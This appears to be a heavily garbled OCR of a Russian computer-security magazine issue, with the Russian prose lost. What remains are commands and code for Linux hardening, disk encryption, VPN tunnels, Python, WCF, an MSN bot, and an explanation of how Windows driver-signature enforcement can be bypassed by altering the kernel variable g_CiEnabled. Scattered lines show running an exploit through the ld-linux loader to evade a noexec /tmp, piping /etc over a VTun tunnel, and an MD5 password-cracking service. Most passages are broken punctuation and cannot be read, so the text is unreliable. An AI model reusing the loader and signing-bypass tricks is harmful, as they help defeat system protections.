.
, ,
.
2. , -
.

( ).

.
3. , ,
092
,
, ,
, ,
.

.
4. , (, , )
,

,

DDoS.
.
5.
DOS-,
,

, ( , , ),

.

( )
.
,
,

, - 0,1%.
!
. ,
. -,
,
. :
( <Ctrl+Alt+L>).
-, ,
qwerty 123.
:
( , ,
X 10 /141/ 10

INFO).
GRUB ,
. : GRUB
( ). , GRUB ,
BIOS,
CD-ROM LiveCD,
.
:
BIOS. :
CMOS
,
. : .
,
. :

.
, , ,
:
. , ,
.
,
CD-,
USB- /.
<Ctrl+Alt+Del>
. ,
/etc/inittab,
ca::ctrlaltdel:/sbin/shutdown -t3 -r now
/sbin/init q.

, ,
.
,

.
- , ,

(. ][ 06.2010). , .
: ,
.
,
DoS/DDoS.
, , , , ,
(][ 09.2009).
X 10 /141/ 10
Tiger
,
.
, Ubuntu, Fedora, OpenSuSE,
,

. , :
,
, . Ubuntu
(System Administration Software Sources
Updates Automatic updates, Install security updates
without confirmation)
/etc/apt/apt.conf.d/10periodic:
$ sudo vi /etc/apt/apt.conf.d/10periodic
APT::Periodic::Enable "1";
APT::Periodic::Update-Package-Lists "1";
APT::Periodic::Download-UpgradeablePackages "1";
APT::Periodic::AutocleanInterval "5";
APT::Periodic::Unattended-Upgrade "1";
, ,
.

, SELinux AppArmor ( Ubuntu, OpenSuSE Fedora),
,
(
Linux,
][).
INFO
info

,
APG,

,

.
suid/
sgid-
:
$ find / -type f \
( -perm -004000 -o
-perm -002000 \)
-links +1 -ls
093
UNIXOID
Tiger
SUID- Linux

( UNIX -
,
), ,
root. ,
,
. , root, .
1. su
, root ,
. ,
/etc/pam.d/su auth required pam_wheel.so
auth sufficient pam_rootok.so. su
, wheel (,
).
2. root ,
,
GRUB
GRUB :
1. /sbin/grub
md5crypt.
md5-.
2. /boot/grub/grub.conf
password --md5 -.
Tiger
Tiger , shell-,
, UNIX-.
, ,
. chkrootkit John the
ripper.
Zeppoo
Zeppoo Linux ,
, ,
/dev/kmem /dev/
mem. : http://sourceforge.net/
projects/zeppoo.
094
root' .
,
: /tmp
(,
- FTP-). ,

noexec ( nosuid,nodev). :
/dev/sda5 /tmp ext2 nosuid,noexec,nodev 0 0

.
:
$ /lib/ld-linux.so.2 /tmp/exploit
, Linux
, RSBAC (www.rsbac.org),
.
3. -
,
: , SUID-.
root-.
( , ), SUID- . ,
, SUID- .
SUID- find:
$ sudo find / -type f $ -perm -04000 -o \
-perm -02000 $ \-exec ls {} \;

root:
$ sudo chmod a-s ///
,
. , man .
4. .
-
,
- (,

X 10 /141/ 10
rkhunter
, ,
). , :
# find /dir -xdev -type d $ -perm -0002 -a \
! -perm -1000 $ -print
5. ,

. , , , FTP-,
-.

( ).
, , ..
. . ,
, ( 022),
- , (
, ).
,
~/.profile:
umask 077

.
, -
, (OpenSSH, ), ,
, FreeBSD Jail Linux
VServer ( ).

- - pidgin.
. ,
, ,
( root
, ). , Firefox,
.
X 10 /141/ 10
, rkhunter
,

( /home ,
).
Linux- Yama (http://lkml.
org/lkml/2010/6/23/25), Canonical.
Yama Ubuntu
:

.
, /tmp /var/tmp. ,
. Yama
, ,
, UID , , UID
.
.
,
, , .

. Yama
, .
ptrace.
ptrace, UID UID,
ptrace. ,

. Yama
ptrace -.

, ,
, , ? .
- ,

( ,
-, -
095
UNIXOID
,
/etc/aide/aide.conf.d,
- .
AIDE,
aideinit:
$ sudo aideinit
/var/lib/aide
aide.db.new.
, :
$ sudo mv /var/lib/aide/aide.db.new /var/lib/aide/aide.
db
Chkrootkit
, ,
), , , ,
, , .
, ,
, ,
/, .
,
(
). ,
, HIDS
( ).
HIDS, UNIX-,
Tripwire,
AIDE (Advanced Intrusion
Detection Environment ). Tripwire, AIDE :
- ,
. :
AIDE
. -
, e-mail
.
AIDE
:
$ sudo apt-get install aide
$ sudo aide -c /etc/aide/aide.conf --check
AIDE cron,
. .
, AIDE, ,
AIDE
USB- (
aide.conf):
# cp /var/lib/aide/aide.db* /usr/bin/aide \
/etc/aide/aide.conf /etc/aide/aide.conf.d/* /media/
,
( , ..) . .
HIDS UNIX-
, .
chkrootkit rkhunter
(rkhunter
, ).
AIDE .
. :
$ sudo chkrootkit
$ sudo rkhunter --check
,
, ..
shell,
(awk, cat, grep, ) .
,
:
AIDE :
* /etc/default/aide
* /etc/aide/aide.conf
AIDE
. , ,
MAILTO , ( root).
,
( , ..)
, (/var/lib/aide/aide.db).
096
$ sudo chkrootkit -p /media/

$ sudo rkhunter --check --bindir /media/

. ,
, ,
. ,
, ,
,
, ,
. z
X 10 /141/ 10
UNIXOID
zobni n@gmail.com

LUKS/dm-crypt, TrueCrypt EncFS

. -
,
,
. ,
,
.
Linux

,
,

:
1. loop-aes (http://loop-aes.sourceforge.net)
Linux-
loop.ko, loopback-,
.
2. LUKS/dm-crypt ,
Linux- dm-crypt
TKS1/TKS2.
3. TrueCrypt
098
.
4. EncFS ,
,
.
, ,
,
. loop-aes
, ,
,
( loop-aes,

). LUKS/dm-crypt,
,
,
2.5
. LUKS/dm-crypt
Linux-, ,
loop-aes,
. TrueCrypt, Linux
Windows-, LUKS/dm-crypt,
, ,
- ( TrueCrypt
Windows Mac OS X),
(

). EncFS ,
X 10 /141/ 10
EncFS ,
EncFS
,
, .

, ,
, .

,
-
.
Watermark-,
(dm-crypt
CBC (ipher Block
Chaining)), ,
ESSIV, LRW XTS).
,
, , AES-256, Serpent Twofish.
, USB-
-.
loop-aes, LUKS/dm-crypt TrueCrypt
EncFS.
,

, , ,
. EncFS
, , ,
. EncFS ,
:
,
,
EncFS,
(, curlftpfs, , encfs,

).
LUKS/DM-CRYPT
LUKS/dm-crypt,
, :
dm-crypt
Linux- 2.6, Device Mapper (dm),
, API (Crypto
API),
.
LUKS (Linux Unified Key Setup) X 10 /141/ 10
Linux,
. LUKS
, ,

. , HAL,

,
LUKS-, ,
, LUKS/
dm-crypt,
, .
LUKS/dm-crypt
.
LUKS-
cryptsetup-luks,
(, Ubuntu)
cryptsetup.
:
$ sudo apt-get install cryptsetup
, dm-crypt .
, :
$ sudo modprobe dm-crypt
$ sudo modprobe sha256
$ sudo modprobe aes
,
/etc/modules:
$ sudo -i
# echo "dm-crypt\nsha256\naes" >> /etc/modules
, , (
, ):
$ sudo dd if=/dev/zero of=/dev/sda5 bs=4K

,
( ,
):
INFO
info
EncFS
Linux,
Mac OS X, FreeBSD
, ,
UNIX,
fuse.
EncFS Windows

www.assembla.com/spaces/
wencfs.
WARNING
warning

/etc/updatedb.
conf.
,
EncFS,

,

inode,
$ sudo dd if=/dev/random of=/dev/sda5 bs=4K
099
UNIXOID

TrueCrypt
TrueCrypt
LUKS/dm-crypt
LUKS/dm-crypt ,
:
# dd if=/dev/urandom of=luks.img bs=1M count=100
# losetup /dev/loop0 luks.img
# cryptsetup luksFormat /dev/loop0 -c aes-cbcessiv:sha256 -s 256
# cryptsetup luksOpen /dev/loop0 luks
# mkfs.ext2 /dev/mapper/luks
# mkdir /mnt/luks
# mount /dev/mapper/luks /luks
LUKS- cryptsetup:
$ sudo cryptsetup luksFormat /dev/sda5 \
-c aes-xts-plain -s 256
'-c' , AES-XTS (

CBC, ECB; Watermark-). '-s'
. cryptsetup , ,
. -
.
, ,
Device Mapper
(
dm-crypt
):
$ sudo cryptsetup luksOpen /dev/sda5
:
$ sudo mkfs.ext4 /dev/mapper/ -L
$ sudo mkdir /mnt/
$ sudo mount /dev/mapper/ /mnt/

,
,
/etc/crypttab /etc/fstab:
$ sudo -i
# echo " /dev/sda5 none luks,cipher=aes-cbcessiv:sha256" >> /etc/crypttab
# echo "/dev/mapper/ /mnt/ ext4 defaults 0 0" \
>> /etc/fstab

,
.

,
/etc/fstab , /home.
/etc/crypttab /etc/fstab . HAL
LUKS-
(Gnome, KDE,
XFCE), , ,
. ,

:
$ sudo chown -R : /media/
$ sudo chmod g+s /media/
, ,
( '-L' mkfs).
LUKS/dm-crypt ( , )
. , .
LUKS luksAddKey cryptsetup:
$ sudo cryptsetup luksAddKey /dev/sda5
,
. , :
$ sudo cryptsetup luksDelKey /dev/sda5 ID-
Device Mapper
:
$ umount /mnt/
$ cryptsetup luksClose sda5
100

:
$ sudo cryptsetup luksDump /dev/sda5
X 10 /141/ 10
TrueCrypt
LUKS/dm-crypt
LUKS/dm-crypt ,
swap-:
TrueCrypt
# swapoff -a
# cryptsetup -d /dev/urandom create cryptoswap /dev/sda1
# mkswap /dev/mapper/cryptoswap -L accessisdenied -v1
# echo "cryptoswap /dev/sda1 /dev/urandom swap" >> /etc/crypttab
# echo "/dev/mapper/cryptoswap none swap sw 0 0" >> /etc/fstab
# swapon -a
,
USB- .
dd:
$ dd if=/dev/urandom of=/// bs=512 count=4
LUKS-:
$ sudo cryptsetup luksFormat -c aes-xts-plain -s 256 \
/dev/sda5 ///
:
$ sudo cryptsetup -d /// luksOpen \
/dev/sda5
TRUECRYPT
TrueCrypt
Windows 2004 , Linux ( 4.0), 2008 ,
TrueCrypt 5.0 Windows,
Linux.
TrueCrypt
, .
, LUKS, Linux- TrueCrypt
dm-crypt, , , fuse
/.
TrueCrypt
LUKS, .
-, TrueCrypt - ,
Windows, Mac OS X Linux, ,
( LUKS- Windows
FreeOTFE, ). , TrueCrypt
X 10 /141/ 10
, ,
. -, TrueCrypt ,
, (LUKS, ,
, ). -, TrueCrypt

(LUKS ).
( TrueCrypt
) TrueCrypt
, :
$ cd /tmp
$ wget http://www.truecrypt.org/download/truecrypt6.3a-linux-x86.tar.gz
$ tar -xzf truecrypt-6.3a-linux-x86.tar.gz
$ ./truecrypt-6.3a-setup-x86

( ). TrueCrypt
/usr,
(, ,
truecrypt-uninstall.sh).
truecrypt
.
/, ,
: (Create
Volume), , ,
.. Create Volume .
, (
), ( ),
, , ,
, (FAT, Ext2 Ext3) ..
. , ,
Select File , , -
101
UNIXOID
EncFS
, .
/tmp: crypted
EncFS, decrypted :
$ cd /tmp
$ mkdir crypted decrypted
EncFS:
$ encfs /tmp/crypted /tmp/decrypted
TrueCrypt
.
.
Dismount All .
,
TrueCrypt :
, '-t'.

. truecrypt -t -c
. (
TrueCrypt' ), :
$ truecrypt -t /// //
. :
EncFS . : expert
( x) paranoid ( p). ,
(AES Blowfish), ,
, Initialization Vector ( , ,
<Enter> ) .. paranoid

.
, ,
paranoid , expert
. ,
Blowfish AES, , .
1024
, EncFS .
4096 x86.
.
decrypted :
$
$
$
$
cd decrypted
echo qwerty > file1
echo asdfgh > file2
echo zxcvbn > file3
EncFS :
$
$
$
$
cd ..
fusermount -u /tmp/decrypted
cd crypted
ls
'-d':
$ truecrypt -d
, TrueCrypt LUKS
.
XTS, LUKS.

AES, Twofish Serpent, .
, TrueCrypt
,
.
ENCFS
EncFS ,
fuse , libfuse, OpenSSL . EncFS
:
$ sudo apt-get install encfs
102
, EncFS ,
. , EncFS
, .encfs .
,
(, ), MAC (Message authentication
code) .
?
Linux .
,
LUKS/dm-crypt,
/
. , LUKS/dm-crypt
,
. .
LUKS/dm-crypt loop-aes
TrueCrypt,
, EncFS,
(, ). z
X 10 /141/ 10
UNIXOID
grinder grinder@tux.in.ua
VPN
VPN-
,
- ,
LAN, ,
VPN. , ,

. , OpenSource.
VTUN
,

TCP/IP . (vtun.
sf.net) VTun:
(
6 2007 ).
,
,
, VTun
*nix : Linux,
*BSD Solaris. Debian/Ubuntu:
$ sudo apt-cache search vtun
vtun - virtual tunnel over TCP/IP
networks
VTun IP, PPP, SLIP, Ethernet, TTY

pipe.
TCP UDP.
128-
BlowFish,
OpenSSL.
zlib lzo.
X 10 /141/ 10
,

CPU . VTun
- .

( 5000 ), .

. VTun
,
.
NAT, VTun
,

TCP. ,
.

tun tap,
(userspace) . ,
, :
$ ls -al /dev/net/tun
crw-rw-rw- 1 root root 10, 200 201007-10 12:39 /dev/net/tun
,
CONFIG_TUN
CONFIG_ETHERTAP.
vtun Debian/Ubuntu:
$ sudo apt-get install vtun

/etc/vtund.conf.
,

.
, .
VTun.
. options default
,
:
$ sudo nano /etc/vtund.conf
options {
port 5000;
syslog daemon;
# -
103
UNIXOID
Ubuntu
Debian/Ubuntu
/etc/default/vtun.
:
VTun
HTTP://WWW
links
VTun
vtun.sf.net
tinc
tinc-vpn.org

n2n ntop.org/n2n
socat
www.dest-unreach.
org/socat/
CIPE
sites.inka.de/bigred/
devel/cipe.html
ifconfig /sbin/ifconfig;
route /sbin/route;
ip /sbin/ip;
firewall /sbin/iptables;
}
default {
compress lzo:9; #
speed 0; #
}
#
client1 {
passwd p@ssVV0rD;
# : tun, ether, tty, pipe
type tun;
proto udp;
encrypt yes;
# speed 256:128;
keepalive yes;
# ,
up {
ifconfig "%% 10.1.0.1 pointopoint 10.1.0.2
mtu 1450
#
# firewall "-t nat -A POSTROUTING -s 10.1.0.2
-j MASQUERADE";
};
# ()
down {
firewall "-t nat -F";
ifconfig "%% down";
};
}
up down, ,
VPN. , ,
, , .
, :
program /bin/sh "-c 'tar cf - /etc/*'";
104
$ sudo nano /etc/default/vtun

#
RUN_SERVER=yes
:
$ sudo invoke-rc.d vtun start
, ,
:
$ sudo vtund -s
, , , :
$ sudo nano /etc/vtund.conf
options {
port 5000;
timeout 60;
ifconfig /sbin/ifconfig;
route /sbin/route;
firewall /sbin/iptables;
}
client1 {
passwd p@ssVV0rD;
type tun;
up {
ifconfig "%% 10.1.0.2 pointopoint 10.1.0.1
mtu 1450";
route "add -net 1.2.3.4/16 gw 10.1.0.1";
};
}
Debian-based , /
etc/default/vtun, init- , .
$ sudo nano /etc/default/vtun
CLIENT0_NAME=client1
# IP VTun
CLIENT0_HOST=vtun.mydomain.ru
vtund , , IP- ()
:
X 10 /141/ 10
tinc.conf
tinc
$ sudo vtund - client1 vtun.mydomain.ru
, :
( /etc/tinc). VPN
, ,
tinc.conf:
$ sudo tail -f /var/log/message
ifconfig tun0 .
Vtun .
init-:
$ sudo invoke-rc.d vtun start
TINC

VPN - tinc (tinc-vpn.org).
( 1998 ), . VTun,
tinc IPv4/IPv6 ,
: Linux, *BSD, Mac OS X,
Solaris, Windows 2k-Se7en. , , iPhone, iPod.
OpenSSL, zlib lzo.
tinc Ethernet
, , , ,
. ,
.
, VTun, tinc TUN/TAP. tinc
.
Windows . Debian/Ubuntu :
$ sudo apt-get install tinc
, .
, ,
, . . /etc/tinc/net.boot
, tinc.
( ), :
$ sudo nano /etc/tinc/net.boot
vpnnet
/usr/share/doc/tinc/examples .
/etc/tinc .
VPN-,
. , /etc/tinc/
vpnnet, vpnnet.
VPN
-, ,
. VPN- ,
X 10 /141/ 10
$ sudo nano /etc/tinc/vpnnet/tinc.conf

#
Name = my_vpn
# ,
# ConnectTo
ConnectTo = vpn01
#
Device = /dev/net/tun
# VPN: router|switch|hub
Mode = switch
PrivateKeyFile = /etc/tinc/vpnnet/rsa_key.priv
#
BindToInterface = eth1
# , ,
# DirectOnly = yes
#
# Forwarding = <off|internal|kernel>
. .
hosts,
: my_vpn vpn01.
$ sudo nano /etc/tinc/vpnnet/hosts/my_vpn
# IP
Address = 1.2.3.4
# ,
Subnet = 192.168.1.0/24
# TCP
# TCPOnly = yes
,
.
$ sudo nano /etc/tinc/vpnnet/hosts/vpn01
Address = vpn01.mydomain.ru
tinc 655;
, , Port.
, ( ).
:
$ sudo tincd -n vpnnet -K
105
UNIXOID
supernode
anytun
man-
,
.
,
/ VPN: tinc-up/tinc-down, host-up/subnet-down, subnet-up/subnet-down.
, .
.
Linux, *BSD, Mac OS X, Windows ( GUI)
OpenWRT TUN/TAP-.
Debian/Ubuntu :
$ sudo nano /etc/tinc/vpnnet/tinc-up

#!/bin/sh
modprobe tun
ifconfig $INTERFACE 192.168.1.10 netmask 255.255.255.0
supernode
edge. N2N . supernode,
'-l' , .
'-v'. :
.
, :
$ sudo /etc/init.d/tinc start
, ifconfig
. - ,
:
$ sudo tincd -n vpnnet -d5 -D
N2N
N2N (network to network, ntop.org/n2n) ,
VPN- .
P2P-,
.
(Edge Node)
. UDP-. supernode,
, Edge Node
. supernode , ,
. , VPN.
supernode
. Supernode Edge
Node, .

( supernode),
. ,
N2N . ,
, . ,
N2N , VPN,
106
$ sudo apt-get install n2n
$ supernode -l 7654 -v
VPN- edge,
. :
-a IP-, VPN-;
- ;
-k VPN-;
-l supernode.
, supernode node1 node2.

:
node1$ sudo edge -a 10.1.2.1 -c mynetwork -k encryptme -l
1.2.3.4:7654
node2$ sudo edge -a 10.1.2.2 -c mynetwork -k encryptme -l
1.2.3.4:7654
Registering with supernode,

ifconfig edge0 . , , ,
IP. :
-h HTTP- ( );
-r / (
Edge Node, );
-f ;
-d TAP- (
X 10 /141/ 10
CIPE
: OpenVPN
HMM3
VPN
anytun-0.3.3.tar.gz 110
vtun-3.0.1.tar.gz 122
cipe-1.6.0.tar.gz 139
tinc-1.0.13.tar.gz 497
n2n_svn_23072010.tgz 535
socat-1.7.1.2.tar.gz 542
openvpn-2.1.1.tar.gz 860
Anycast
VoIP .
, VPN
.
Anycast- ,
- . VPN
anycast, , , unicast anycast-, SATP (Secure Anycast Tunneling Protocol).
SATP anytun (anytun.org).
Quagga,
UDP anycast NAT. . ,
, man .
CIPE (Crypto IP Encapsulation, sites.inka.de/bigred/

devel/cipe.html) .
CIPE ( CIPEv3) IP- UDP-, . cipcbx.
128- (Blowfish, IDEA),
. CIPE
, .
CIPE NAT
SOCKS,
. , ,
GRE .
CIPE Linux,
WinNT4.0 SP3/SP6, Win2k (cipewin32.sf.net).
(
2002 ), , CIPE . , Ubuntu cipe-common
cipe-source 6.06 (Dapper Drake),
CIPE
.
: (UDP, TCP,
UNIX, IP4, IP6, raw), , ,
, . socat
TCP- , Unix-, .
, SSL socat.
, .
Debian/Ubuntu , .
EXAMPLES, ,
. TUN-,
5555:
$ sudo socat -d -d TCP-LISTEN:5555,reuseaddr
TUN:192.168.1.1/24,up
, TCP-
:
$ socat TCP:1.2.3.4:5555 TUN:192.168.255.2/24,up
ifconfig tun0 .
SSL . :
).
, P2P VPN,
P2PVPN (p2pvpn.org).
. Java
, Java RE.
32- Linux Windows.
RSA (1024 ), AES (128 ).
NETCAT SOCAT
, , , TCP/UDP- , / , netcat.
. ( 2004 ), ()
: OpenBSD netcat, Ncat, Cryptcat, socat.
, socat (www.dest-unreach.org/socat/) X 10 /141/ 10
$ sudo socat openssl-listen:4444,reuseaddr,cert=/etc/vpn/

server.pem,cafile=/etc/vpn/client.crt echo
:
$ sudo socat stdio openssl-connect:example.ru:4444,cert=/
etc/vpn/client.pem,cafile=/etc/vpn/server.crt
, socat Linux, *BSD, OpenSolaris, Mac

OS X Cygwin.
. , VPN. ,
.z
107
CODING
akrasnoschekov@gmail.com
PYTHON
-

Python
:).
, ,
, ,
.
?! !
-, , , ,
. , ,
,
. , ,
:). -, , - . .
- ... , , .
:
( )
double area_of_circle(double r) {
return M_PI*pow(r,2);
}
int main() {
double r = 5;
cout << ": "<< area_of_circle(r)<< endl;
}
:
( )
class Circle {
double r;
public:
Circle(double r) { this->r = r; }
double area() { return M_PI*pow(this->r,2); }
void print_area() {
108
cout << ": "<< this->area() << endl;

}
};
int main() {(new Circle(5))->print_area();}
-... , ( ), - ( ).
- , , C++
.
( , ),
.
, , , .
,
,
, , .
, , .
:
:
.
/ .
- .
: Haskell, Erlang, F#
X 10 /141/ 10
>> coding
DVD
dvd

.
:).
. !
.
(
), .
,
.
:
, -
.
.
.
: Prolog

, , , .
:
Prolog
{ }
witch(X) <= burns(X) and female(X).
burns(X) <= wooden(X).
wooden(X) <= floats(X).
floats(X) <= sameweight(duck, X).
{ }
female(girl).
sameweight(duck,girl).
{ }
? witch(girl).
,
- ,
. .
,
.
, , .
f(x),
x .
,
,
.
X 10 /141/ 10
, , . :).
data :

data = [...]
sum = 0
for element in a:
sum += element ** 2
print sum

data = [...]
sq = lambda x: x**2
sum = lambda x,y: x+y
print reduce(sum, map(sq, data))
,
. ,

.
Lisp, ( , ?).

.
,
( ) .
,
,
.
,
. .
HTTP://WWW
links

,

:
http://www.python.org
http://en.wikipedia.
org/wiki
Programming_
paradigm
http://www.ibm.com/
developerworks/
library/l-prog.html
INFO
info
,

Lambda , ,
.
.
- :
.
. map, reduce
109
CODING

, ( )
( map) ( reduce).
, .
Lambda-
def add(n):
return lambda x: x + n
adds = [add(x) for x in xrange(100)]
.
. , ,
.

. : print length([5, 4/0, 3+2]).
, .

, .
!
.
, .
adds[34](5)
, .

.
,
. lambda x.
-
, .
,
. ,
. ,
, , , .
() , ,

.
.
,
,
.
,
. ,
.
, ,
.
:
-, ,
,
.
,
.
-, , . ,
110
,
,
syntactic sugar.
,
, .
, adds = [add(x)
for x in xrange(100)].
. , ?
, and or, if-elif-else.
, .

L = []
for x in xrange(10):
if x % 2 == 0:
if x**2>=50:
L.append(x)
else:
L.append(-x)
print L

print [x**2>=50 and x or -x for x in xrange(10) if
x%2==0]
,
, , . , ... .
, , , ,
, . .
, ,
.z
X 10 /141/ 10
CODING
c0n Difesa condifesa@gmail.com, http://defec.ru
se
rpri
Entervices
Se
et
.N
WCF

Messaging
g
in
t
o
m
e
R
Windows
Communication
Foundation (WCF)
WTF WCF?
Web Servic
es
WS
E
Windows Communication Foundation:

-
. Cloud Computing ,

,
.
.
.NET Framework.
.NET Remoting ,
. Microsoft ,
,
-. ,
.
,
Remoting, Windows Communication
Foundation, , , .NET Framework.
,
-,
,
-
112
. ,
, cloud computing , ,
,
. ,
?
WCF.
-.
, WCF WEB HTTP,

- :
// (GET POST), (URI),
( XML, AJAX JSON,
SOAP). , .
-
:
. ,
X 10 /141/ 10
>> coding

.
,
(, , , ) , .
WCF
, .

.

: SOAP REST.
SOAP (Simple Object Access Protocol)
,
.
.NET Remoting.
SOAP .
,
.
GetBalance(int AccountID)
. HTTP-
:
SOAP-
// HTTP-
SOAPAction: GetBalance
//SOAP-
<soap: Envelope xmlns: soap >
// SOAP-
<soap: Body>
<GetBalance xmlns = >
<Account>2</Account>
</GetBalance>
</soap: Body>
</soap: Envelope>
SOAP- . REST (Representational State Transfer)

SOAP.
, HTTP, URI, XML.

, SOAP,
, URI.
/ -
X 10 /141/ 10
RESP
HTTP (GET, POST, PUT, DELETE).
URL, : www.servicesite.com/Accounts/2.
, ,
URL, .
,
,
.

REST-
,
SOAP
,

-, SOAP-,

.
SOAP:
XML- , . REST
.
,
, ,
. , grid-, MD5-, ,
MD5- ,
.
WCF ,
.
DVD
dvd

.

.
HTTP://WWW
links
www.xakep.ru/
post/52434/
.NET Remoting:
grid-.
www.techdays.ru/

,

WCF.
http://defec.ru
,

.
113
CODING
, ,
. , ,
(/) .
SOAP
MICROSOFT
WCF- WCF-
. ,
, - . ( Remoting!)
( ). WCF- ,
, ,
,
.
, ( ), .

WCF-
WCF-

: HTTP, TCP,
MSMQ . WCF SOAP. ,
, REST-.
Windows Communication Foundation :
1. (Address);
2. (Binding);
3. (Contract).

. . , , .
URI (
, , ).
, , (,
TcpTransportBindingElement TCP),
(
ReliableSessionBindingElement)
SOAP- (
SecurityBindingElement). , ,
, .
114
WCF- ,

.

ServiceContractAttribute ( Remoting).
, ,
,
OperationContractAttribute. ,
:

[ServiceContract]
public interface AddIntPoint
{
[OperationContract]
int Add(int x, int y);
}

, :

public class AddService : AddIntPoint
{
public int Add(int x, int y)
{ return x + y; }
}
AddService WCF-
.
. ,
, PasswordCrack (string MD5hash),
. ,
( -
), WCF-
.
:

public class WCFServiceApp
{
//
public void DefineEndpointImperatively()
{...}
//
public void DefineEndpointInConfig()

{...}
}
DefineEndpointImperatively() , , HTTP :
...
ServiceHost sh = new ServiceHost(typeof(AddService));
sh.AddServiceEndpoint(
typeof(AddIntPoint),
X 10 /141/ 10
>> coding
WCF
new WSHttpBinding(),
"http://localhost/AddService/Ep1");
sh.Open();
...
AddIntPoint :
public class WCFClientApp
{
//
public void SendMessageToEndpoint()
{
MathProxy proxy = new MathProxy();
int result = proxy.Add(35, 7);
}
}

. ,
,
,
() .

.
, ,
,
. .
, ,
/
( ,
..). WCF-
IIS- (
X 10 /141/ 10
-,
).
, HTTP.
, ?
WCF :
, , .
, Windows Communication
Foundation, .
.
- ( ) ,

.
. ,
, :
?. , , . , . , ? :

, - . ,

, .

, WCF-
, .
,

.
.z
115
CODING
www.flenov.info
MSN-

IM-
IM- ? , .
? , MSN. , ( ,
), . ,
,
.
?
-,
(, )
, .
( ) Microsoft Messenger, ,
. Microsoft
, ,
, , MS, .
.
,
MSNPSharp (http://code.google.
com/p/msnp-sharp/).
,
, MSN-.
MSNPSharp, .

, . , , :
1. ;
2. - ,
.
, ;
3. - ,
.
116
,
. (
, ),

. ,
MSN .
Messenger,
:
Messenger messenger = new Messenger();
. MSNPSharp . ,
,
.
. ,
.
, , .
, , .
. ,
:
NameserverProcessor.ConnectionEstablished , ;
Nameserver.SignedIn ;
Nameserver.SignedOff ,
X 10 /141/ 10
>> coding
. ,
. , *nix-.
,
.
, .
, .
, MSN-
, .
- ,
.
, . , -
, . , MSN,
Nameserver . ,
AddNewContact ContactService. ?
, :
Messenger.Nameserver.ContactService.
AddNewContact("pamela_anderson@hotmail.com");
, . ContactList, .
, All (ContactList.All).
:
Allowed ;
BlockedList ,
.

-, ;
Nameserver.AuthenticationError ;
ConversationCreated
.
, . .
, . Credentials, .
Credentials
. , ,
, :
,
. ,
. , AutoSynchronize true:
messenger.Nameserver.AutoSynchronize = true;
,
AutoSynchronize
ConnectionEstablished.
.
, SignedIn,
. ,
, online :
messenger.Owner.Status = PresenceStatus.Online;
messenger.Credentials = new Credentials(

"youaccount@hotmail.com", "qwerty");

,
Connect();.
, . - ,
, invite ,
.
,
e-. , , ,
X 10 /141/ 10
,
PresenceStatus.Busy. ,
, -,
, .
. .
,
Conversation:
Conversation conversation =
messenger.CreateConversation();
,
ConversationCreated. ,
117
CODING
MSNPSharp
,
, .
, messenger- , , MsnAccountTo:
private void messenger_ConversationCreated(
object sender, ConversationCreatedEventArgs e)
{
if (e.Initiator != null)
{
foreach (MSNPSharp.Contact
contact in messenger.ContactList.All)
{
if (contact.Mail == MsnAccountTo)
{
e.Conversation.ContactJoined +=
new EventHandler<ContactEventArgs>(
ContactJoined);
e.Conversation.Invite(contact);
return;
}
}
messenger.Nameserver.ContactService.AddNewContact
(MsnAccountTo);
}
}
, .
- ,
, .
Conversation .
ContactJoined , , :
e.Conversation.ContactJoined +=
new EventHandler<ContactEventArgs>(ContactJoined);
Invite :
e.Conversation.Invite(contact);
118
. ConversationCreated . ,
, . , ,
,
. , .
.
,
ContactJoined. . , :
private void ContactJoined(object sender,
ContactEventArgs e)
{
TextMessage message =
new TextMessage(currentmessage);
(sender as Conversation).SendTextMessage(message);
}
.
TextMessage.
.
Conversation,
, . ,
SendTextMessage
.
Conversation , .
, Conversation .
. , MSN
, Skype,
, .
-,
, , .
. z
X 10 /141/ 10
CODING
stannic.man@gmail.com
: ( )
?
? ,
,
Alt+TAB? ,
, ?
? !
? .
, Driver Signature Enforcement, , TLS Thread
Local Storage,
PE-.
- Driver Signature
Enforcement
, Windows Vista, Microsoft

( )
( Vista 64- ).
, , ,
. , , .
Windows Vista/7 ,
, Verisign
Thawte.
- . , , ,
. ,
, ,
.
,
. , ,
, Driver Signature Enforcement.
i.dll, , , /%systemroot%/system32.
:
X 10 /141 10
CiCheckSignedFile
CiFindPageHashesInCatalog
CiFindPageHashesInSignedFile
CiFreePolicyInfo
CiGetPEInformation
CiInitialize
CiVerifyHashInCatalog
CiInitialize,
, :
VOID SepInitializeCodeIntegrity()
{
ULONG CiOptions;
{spipped...}
memset( g_CiCallbacks, 0, 3*sizeof ( SIZE_T ));
CiOptions = 4|2;
if(KeLoaderBlock)
{
if(*(ULONG*)(KeLoaderBlock+84))
{
if(SepIsOptionPresent((KeLoaderBlock+84),
L"DISABLE_INTEGRITY_CHECKS"))
CiOptions = 0;
if(SepIsOptionPresent((KeLoaderBlock+84),
L"TESTSIGNING"))
CiOptions |= 8;
}
CiInitialize(CiOptions,(KeLoaderBlock+32),
119
CODING
F8 Vista
&g_CiCallbacks);
}
}
, CiInitialize
:
g_CiCallbacks[0] = CI!CiValidateImageHeader,
g_CiCallbacks[1] = CI!CiValidateImageData,
g_CiCallbacks[2] = CI!CiQueryInformation.

:
nt!SepInitializeCodeIntegrity
nt!SepInitializationPhase1 + 0x1a1
nt!SeInitSystem + 0x29
nt!Phase1InitializationDiscard + 0x7ce
nt!Phase1Initialization + 0xd
nt!PspSystemThreadStartup + 0x9e
nt!KiThreadStartup + 0x19
, SepInitializeCodeIntegrity ( ,
CiInitialize)
. CiInitialize,
, , Boot Driver List ( , ).
,
.
.
Vista/7 :
nt!MmLoadSystemImage
nt!MiObtainSectionForDriver
nt!MiCreateSectionForDriver
nt!MmCheckSystemImage
120
Windows Boot Manager 0xc0000428

tcpip.sys
nt!NtCreateSection
nt!MmCreateSection
nt!MiValidateImageHeader
nt!SeValidateImageHeader
nt!_g_CiCallbacks[0] .. CI!CiValidateImageData
SeValidateImageHeader ,
.
:
nt!g_CiEnabled ( , ,
:)) , TRUE,
nt!g_CiCallbacks[0].
NULL, .
nt!g_CiCallbacks[0] , 0xc0000428,
Windows cannot
verify the digital signature of this file.
nt!g_CiEnabled FALSE,
, ,
STATUS_SUCCESS. !
WIndows Vista / 7 , .
: , ,
. -
,
. , ,
nt!g_CiEnabled, nt!g_CiCallbacks
.
RTFM
TLS? Thread Local Storage,

,
Windows.
,
.
TLS
, .
X 10 /141/ 10
, ...
, -,
?
, . ,
, ,
, TLS. , .
. , ? ,
ThreadProc
. TLS?
?
TLS Windows
, , kernel32 (TlsGetValue, TlsSetValue, TlsAlloc TlsFree), ,
,
, __declspec(thread) . :
?. : TLS
Windows
Vista , __declspec(thread)
